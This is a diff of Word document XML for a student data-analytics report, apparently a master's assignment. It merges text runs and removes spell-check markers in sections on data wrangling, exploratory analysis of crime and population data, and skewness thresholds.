-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1393307185">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1530295400">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="2134978705">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="1819345686">
     <w:abstractNumId w:val="14"/>
   </w:num>
-  <w:num w:numId="8" w16cid:durableId="2134978705">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
-  <w:num w:numId="9" w16cid:durableId="1819345686">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
   <w:num w:numId="10" w16cid:durableId="1624070426">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="881406841">
     <w:abstractNumId w:val="1"/>
@@ -18578,37 +19382,40 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="13" w16cid:durableId="266432641">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="14" w16cid:durableId="1958953252">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="15" w16cid:durableId="1294672183">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="16" w16cid:durableId="354817324">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="17" w16cid:durableId="584535353">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="18" w16cid:durableId="378936254">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="19" w16cid:durableId="1385257368">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="20" w16cid:durableId="1897400402">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="21" w16cid:durableId="1502046198">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="22" w16cid:durableId="428621930">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="23" w16cid:durableId="251742147">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="24" w16cid:durableId="1959725489">
+    <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>
 </file>

--- a/MSC_DA_CA1_Jose_Mario.docx
+++ b/MSC_DA_CA1_Jose_Mario.docx
@@ -307,37 +307,12 @@
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t>Bharathi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>Chakravarthi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>/</w:t>
+              <w:t>Bharathi Chakravarthi/</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -350,17 +325,8 @@
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t xml:space="preserve">Marina </w:t>
+              <w:t>Marina Iantorno</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>Iantorno</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -389,13 +355,8 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
-              <w:t>Taufique</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> Ahmed</w:t>
+              <w:t>Taufique Ahmed</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1336,29 +1297,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">This project is available on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>github</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>This project is available on github:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1473,11 +1412,6 @@
         <w:rPr>
           <w:rStyle w:val="Strong"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
       </w:pPr>
     </w:p>
     <w:p>
@@ -4244,7 +4178,6 @@
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4253,31 +4186,8 @@
                 <w:szCs w:val="16"/>
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
-              <w:t>Dún</w:t>
+              <w:t>Dún Laoghaire-Rathdown</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-                <w:lang w:eastAsia="en-IE"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Laoghaire-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-                <w:lang w:eastAsia="en-IE"/>
-              </w:rPr>
-              <w:t>Rathdown</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -5860,18 +5770,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">This project is available on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>github</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>This project is available on github</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6007,25 +5907,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Data Wrangling is the first step to be performed with the data. This process consists of cleaning, transforming, and manipulating the data to make it more usable for analysis. This process will be performed in a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Notebook:</w:t>
+        <w:t>Data Wrangling is the first step to be performed with the data. This process consists of cleaning, transforming, and manipulating the data to make it more usable for analysis. This process will be performed in a Jupyter Notebook:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6255,7 +6137,6 @@
         </w:rPr>
         <w:t>“</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6264,7 +6145,6 @@
         </w:rPr>
         <w:t>crime_df</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6281,7 +6161,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6312,16 +6191,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>rame</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, one</w:t>
+        <w:t>rame, one</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6331,7 +6201,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> ‘</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6340,7 +6209,6 @@
         </w:rPr>
         <w:t>NaN</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6390,53 +6258,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>method .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dropna</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">() has been used in this </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dataframe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>The method .dropna() has been used in this dataframe.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6509,7 +6331,6 @@
         </w:rPr>
         <w:t xml:space="preserve">EDA allows us to gain an overall understanding of the </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
@@ -6532,14 +6353,7 @@
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>rames</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>, detect relationships between variables, and examine the distribution of the variables of interest. In this study, the exploratory data analysis (EDA) step will be used to perform both statistical analysis and visualization tasks.</w:t>
+        <w:t>rames, detect relationships between variables, and examine the distribution of the variables of interest. In this study, the exploratory data analysis (EDA) step will be used to perform both statistical analysis and visualization tasks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6956,14 +6770,12 @@
         </w:rPr>
         <w:t xml:space="preserve">, the </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
         <w:t>population_df</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
@@ -6974,21 +6786,7 @@
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">  and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">  and crime_df </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7051,25 +6849,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">This process will be performed on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> notebook:</w:t>
+        <w:t>This process will be performed on Jupyter notebook:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7089,9 +6869,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>MSC_DA_CA1_Jose_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7100,7 +6879,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Mario</w:t>
+        <w:t>.ipynb</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7110,7 +6889,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>.ipynb</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7125,30 +6904,72 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>and it was called</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it was called</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hase 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - EDA </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7156,49 +6977,130 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> “</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hase 0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - EDA </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Skewness:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Skewness is a measure of how much the distribution of a random variable deviates from symmetry.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>It is important to consider the skewness when performing statistical tests. In some statistical tests, if the data is skewed, these tests may not be valid.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Skewness is classified as follows:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Highly skewed: Less than -1 or greater than 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Moderately skewed: Between -1 and -0.5 or between 0.5 and 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Approximately symmetrical: Between -0.5 and 0.5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7213,148 +7115,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Skewness:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Skewness is a measure of how much the distribution of a random variable deviates from symmetry.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>It is important to consider the skewness when performing statistical tests. In some statistical tests, if the data is skewed, these tests may not be valid.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Skewness is classified as follows:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Highly skewed: Less than -1 or greater than 1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
